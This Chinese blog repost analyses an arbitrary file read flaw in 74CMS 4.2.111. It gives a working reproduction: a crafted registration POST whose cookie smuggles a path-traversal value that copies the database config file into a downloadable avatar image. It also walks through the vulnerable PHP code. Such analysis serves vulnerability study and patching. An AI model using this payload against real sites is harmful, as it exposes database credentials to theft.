某CMS 任意文件读取漏洞分析

最新推荐文章于 2024-04-26 13:53:30 发布
最新推荐文章于 2024-04-26 13:53:30 发布
阅读量1.2k 收藏 1
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/penight/p/10962840.html
版权

0x01 漏洞概述

74CMS是一套专业的人才招聘系统,复现此漏洞的版本号为:4.2.111。下载地址是:http://www.74cms.com/download/index.html

0x02 漏洞复现

发送一个构造好的POST请求:

url: http://74cms.test/index.php?m=Home&c=Members&a=register
post: reg_type=2&utype=2&org=bind&ucenter=bind

cookie: members_bind_info[temp_avatar]=../../../../Application/Common/Conf/db.php;members_bind_info[type]=qq;members_uc_info[password]=123456;members_uc_info[uid]=1;members_uc_info[username]=tttttt;

headers:
Content-Type: application/x-www-form-urlencoded 
X-Requested-With: XMLHttpRequest

然后访问此 http://127.0.0.1/74cms/data/upload/avatar/1906/09/98aabd8705b4ce1dc1b33f814a127e05.jpg 并下载这张图片(图片的文件名可以用工具破解,下面会讲)。把后缀 .jpg 改成 .php 再打开就是 /Application/Common/Conf/db.php的内容。

0x03 漏洞分析

漏洞点在:\74cms\Application\Home\Controller\MembersController.class.php 的 _save_avatar()函数。

<?php

......
    protected function _save_avatar($avatar,$uid){
        if(!$avatar) return false;
        $path = C('qscms_attach_path').'avatar/temp/'.$avatar;
        $image = new \Common\ORG\ThinkImage();
        $date = date('ym/d/');
        $save_avatar=C('qscms_attach_path').'avatar/'.$date;//图片存储路径
        if(!is_dir($save_avatar)) mkdir($save_avatar,0777,true);
        $savePicName = md5($uid.time()).".jpg";
        $filename = $save_avatar.$savePicName;
        $size = explode(',',C('qscms_avatar_size'));
        copy($path, $filename);
        foreach ($size as $val) {
            $image->open($path)->thumb($val,$val,3)->save("{$filename}._{$val}x{$val}.jpg");
        }
        M('Members')->where(array('uid'=>$uid))->setfield('avatars',$date.$savePicName);
        @unlink($path);
    }

可以看到 _save_avatar() 函数首先获取要读取文件的路径,再生成图片存储路径 $save_avatar 和 文件名 $filename。然后用copy()函数把读取的文件内容复制给 $filename。其中$avatar 和 $filename 都是可以控制的变量。

 上面说到,访问图片需要文件名。从中可以看到变量$savePicName 可以控制,写个脚本爆破即可得到。

我们跟踪一下调用此函数的 register() 函数,路径在:\74cms\Application\Home\Controller\MembersController.class.php

仔细分析此段代码,要顺利地调用 _save_avatar(),X-Requested-With: XMLHttpRequest,绕过AJAX判断。在229行,post参数reg_type应为2,注册方式为邮箱。不然注册方式为手机时,会进行手机验证码。在232行,post参数utype 的值1和2都可以。

在250行,当post的参数ucenter为bind时,通过cookie获取数组$uc_user,接着会进行数组合并,其中$data是可控的。

 继续往下分析,到漏洞触发点 311行:

这里首先会把对象转为数组,最后执行 _save_avatar()函数,其中 cookie('members_bind_info') 和$data 都是可控的,把要读取的文件复制到指定文件中。cookie的exp为:

members_bind_info[temp_avatar]=../../../../Application/Common/Conf/db.php;members_bind_info[type]=qq;members_uc_info[password]=123456;members_uc_info[uid]=1;members_uc_info[username]=tttttt;

 

转载于:https://www.cnblogs.com/penight/p/10962840.html

weixin_33859844
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】YzmCMS-远程命令执行-pay_callback
知黑而守白
06-19 128
YZMCMS是一款轻量级、高效且开源的内容管理系统,它基于PHP+Mysql架构,采用自主研发的YZMPHP框架和MVC模式进行开发。该系统具有卓越的跨平台性能,能够稳定运行在Linux、Windows、MacOSX、Solaris等多种操作系统上。YzmCMS pay_callback 接口处存在远程命令执行漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
Web-CMS漏洞
凌云鹤YK
02-21 8357
Web-CMS漏洞Web-CMS漏洞漏洞一:ThinkPHP &lt;5.0.24 Request.php 远程代码执行漏洞漏洞二:ThinkPHP 5 &lt;=5.0.22 远程代码执行高危漏洞漏洞三:微擎最新版SQL注入漏洞四:微擎1.5.4任意用户删除漏洞 Web-CMS漏洞 漏洞一:ThinkPHP &lt;5.0.24 Request.php 远程代码执行漏洞 Url:https:/...
PbootCms-3.04前台RCE挖掘过程1
08-03
是借鉴了第篇章的某些思路。接着直接来看代码,先标仍然是解析 if 标签的代码块,看下三个正则相对于上个版本来说,第三条正则多了 (\([\w\s\.]+\))
Goby漏洞更新 | PbootCMS 3.1.2 远程代码执行漏洞(CVE-2022-32417)
m0_46699477的博客
04-01 5667
PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。
vulnhub渗透日记04:Lampiao
ericalezl的博客
07-16 476
时间:2023.7.16,靶机来自vulnhub,感谢您的查阅arp-scan netdiscover -i eth0 -r 192.168.58.1/24 nmap -sn 192.168.58.1/24 都是可以发现主机的 masscan扫描开放哪些端口 nmap针对开放的端口进一步探测 80端口没啥东西 进入1898 点击图片url有id值 尝试修改 访问audio.m4a是一段音频,说了句 user tiago qrc.png里面是个二维码,扫过没啥用 第三页,有个mp3,咋的还得听首歌呗! 听
齐博CMSV7任意文件读取漏洞批量测试POC
m0_46371267的博客
04-22 1405
注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。 # -*- coding:utf-8 -*- import requests import re import urllib import base64 def dakai(filename): with open(filename,'r',encoding='utf-8') as fp: # url_list = [] # for i in fp.readlines():
Goby漏洞更新 - PbootCMS 3.1.2 远程代码执行漏洞(CVE-2022-32417)
dzqxwzoe的博客
02-21 806
查看Goby更多漏洞:[Goby历史漏洞合集](https://github.com/gobysec/GobyVuls/blob/master/GobyVuls-PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。如果你对网络安全入门感兴趣,那么你需要的话可以点击这里。
极致CMS 漏洞简单分析
ximo的博客
05-02 5030
环境搭建 极致CMS1.6.7 下载地址:https://www.jizhicms.cn/thread-95-1-1.html 目录框架 404.html A 后台控制文件 Conf 公共函数 FrPHP框架 Home 前台控制文件 Public 公共静态文件 README.md admin.php 后台入口 backup 备份 cache 缓存 favicon.ico index.php 前台入口 install readme.txt static 静态文件 web.co
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
74cms v4.2.X任意文件读取漏洞
09-06
74cms任意文件读取漏洞可能导致以下风险: - **数据泄露**:攻击者可以读取到敏感文件,如数据库配置、用户信息等。 - **服务中断**:攻击者可能删除关键文件,导致系统崩溃。 - **权限提升**:结合SQL漏洞,攻击者...
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多...
74cms 骑士人才系统 v4.2.111 正式版
10-13
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创
bagecms V3.1.3 后台任意文件读取漏洞1
08-03
#### 漏洞分析 **漏洞位置**: `www\protected\modules\admini\controllers\TemplateController.php`第100行 **关键代码**: ```php public function actionUpdateTpl($filename) { // ...其他代码... $filename ...
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
### eyoucms V1.0.4 后台任意文件读取漏洞详解 #### 漏洞背景 易优CMS(eyoucms)是一款基于PHP+MySQL开发的企业级建站系统,广泛应用于中小企业的网站搭建。它支持多平台访问,包括PC端、移动端以及微信平台。...
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
最新发布
2401_84252281的博客
04-26 796
任务环境说明:服务器场景:Server1。
xray扫描器的使用 (长亭科技公司创造)
yyj1781572的博客
11-27 8877
xray扫描器的使用 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具
74cmsSEv3.4.1存在任意文件读取漏洞(CVE-2022-26271)
qq_69432323的博客
07-23 240
74cmsSEv3.4.1存在任意文件读取漏洞
骑士 74CMS V3.4漏洞
weixin_61842894的博客
02-07 808
骑士 74CMS V3.4
CMS 4.2.111 CSRF to RCE漏洞分析
weixin_33963189的博客
05-17 423
0x01 漏洞概述 74CMS是一套专业的人才招聘系统,其在后台更换风格模板的时候,未对参数tpl_dir的值进行严格过滤,导致危险的代码可以插入到配置文件中,进而导致任意命令执行。我在复现此漏洞时发现,觉得这个漏洞更像是csrf导致的getshell。只要管理员点击攻击者构造的url,就可以插入危险代码导致命令执行。 74CMS 4.2.111下载地址:http://www.74cms....
熊海cms文件包含漏洞
07-29
文件包含漏洞是一种常见的安全漏洞,它允许攻击者通过包含恶意文件来执行任意代码或获取敏感信息。 针对熊海CMS文件包含漏洞,你可以采取以下措施来缓解风险: 1. 及时更新:确保你使用的是最新版本的熊海CMS,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值